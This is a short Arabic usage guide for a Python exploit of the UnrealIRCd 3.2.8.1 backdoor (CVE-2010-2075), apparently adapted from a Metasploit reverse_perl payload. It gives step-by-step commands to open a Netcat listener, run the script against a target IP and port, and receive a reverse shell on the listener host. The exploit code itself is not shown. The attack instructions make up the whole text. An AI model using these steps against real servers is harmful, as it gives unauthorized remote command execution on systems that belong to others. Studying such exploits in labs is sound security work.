
استغلال بايثون للباب الخلفي في UnrealIRCd 3.2.8.1 (CVE-2010-2075) يقدم شلًا عكسيًا عبر مستمع Netcat.
استغلال تنفيذ الأوامر عبر الباب الخلفي لـ UnrealIRCd 3.2.8.1 بلغة Python 3 (CVE-2010-2075).
UnrealIRCd الإصدار 3.2.8.1 يحتوي على حصان طروادة يسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية (CVE-2010-2075).
اعتمدت على حمولة Metasploit payload/cmd/unix/reverse_perl لإنشاء هذا النص البرمجي.
ابدأ مستمع Netcat على المضيف المستقبل:
nc -lp 4444
نفذ النص البرمجي مع توفير الوسائط الموضعية التالية:
python3 script.py <target> <tport> <listener> <lport>
<target> عنوان IP للمضيف الهدف.<tport> رقم منفذ المضيف الهدف.<listener> عنوان IP للمضيف المستمع.<lport> رقم منفذ المضيف المستمع.قم بإعداد مستمع Netcat على جهازك المحلي:
nc -lp 4444
شغّل النص البرمجي ضد جهاز هدف على عنوان 192.168.1.3 منفذ TCP 6697:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
انتظر دقيقة وسيتلقى مستمع Netcat شلّة عكسية.